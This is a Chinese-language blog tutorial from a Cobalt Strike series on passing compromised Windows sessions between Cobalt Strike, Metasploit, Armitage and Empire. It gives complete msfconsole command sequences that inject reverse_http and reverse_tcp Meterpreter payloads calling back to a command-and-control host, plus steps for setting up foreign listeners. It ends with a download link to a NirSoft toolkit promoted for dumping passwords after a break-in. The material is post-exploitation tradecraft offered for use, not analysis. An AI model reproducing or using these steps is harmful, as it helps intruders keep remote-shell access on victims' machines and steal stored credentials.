Cobaltstrike系列教程(十二)CS與MSF,Armitage,Empire會話互轉

0x000-前文

有技術交流或滲透測試培訓需求的朋友歡迎聯繫QQ547006660
2000人網絡安全交流羣,歡迎大佬們來玩
羣號820783253

0x001-Cobaltstrike與MSF會話互轉

①Metasploit派生shell給Cobaltstrike

首先,你需要拿到一個metepreter會話,本例中session爲1
Cobaltstrike的teamserver的ip爲8.8.8.8,http監聽器端口爲4555

msf exploit(handler) >  use exploit/windows/local/payload_inject
msf exploit(payload_inject) >  set PAYLOAD windows/meterpreter/reverse_http
msf exploit(payload_inject) > set DisablePayloadHandler true
msf exploit(payload_inject) > set LHOST 8.8.8.8.
msf exploit(payload_inject) > set LPORT 4555
msf exploit(payload_inject) > set SESSION 1
msf exploit(payload_inject) > exploit

如圖Cobaltstrike成功上線
在這裏插入圖片描述

②Cobalt strike 派生 shell 給 MSF(前提有個beacon shell)

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 8.8.8.8
lhost => 8.8.8.8
msf exploit(handler) > set lport 5555
lport => 5555
msf exploit(handler) > exploit

然後在cobaltstrike中創建一個windows/foreign/reverse_tcp Listener
,並根據metasploit監聽配置cobaltstrike的listener
在這裏插入圖片描述
選擇要派生的beacon,右鍵–>增加會話,選擇剛剛配置的foreign監聽器
在這裏插入圖片描述
MSF即可成功收到會話
e8QAu6.png

0x002-Cobaltstrike與Armitage會話互轉

Cobaltstrike派生shell給Armitage

首先在armitage中配置一個handler,注意:payload要與cobaltstrike的foreign監聽器的協議相同,不然收不到會話。
在這裏插入圖片描述
同樣使用剛剛講過的cobaltstrike派生會話功能,armitage即可收到shell
在這裏插入圖片描述

Armitage派生shell給cobaltstrike

選擇armitage中的會話,右鍵,Access–>Pss Session
在這裏插入圖片描述
隨後配置相關信息爲cobaltstrike http監聽器的ip和端口
在這裏插入圖片描述
Cobaltstrike即可收到會話

0x003-Cobaltstrike與Empire會話互轉

首先如圖,在empire中配置好相關的http協議監聽器
在這裏插入圖片描述
在cobaltstrike裏面添加一個foreign監聽器,協議爲http
在這裏插入圖片描述
隨後使用cobaltstrike中講過的“增加會話”功能,選擇該http監聽器,empire即可成功收到會話。

0x004-小福利

今天分享的是神器nirsoft半漢化版,該程序在以管理員的身份運行時,可以讀取機器中各種各樣的密碼,無疑是後滲透的神器之一。
在這裏插入圖片描述
鏈接:https://pan.baidu.com/s/1Ubh-HKf-FYdUAOxL7ooAGA
提取碼:e8pz

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章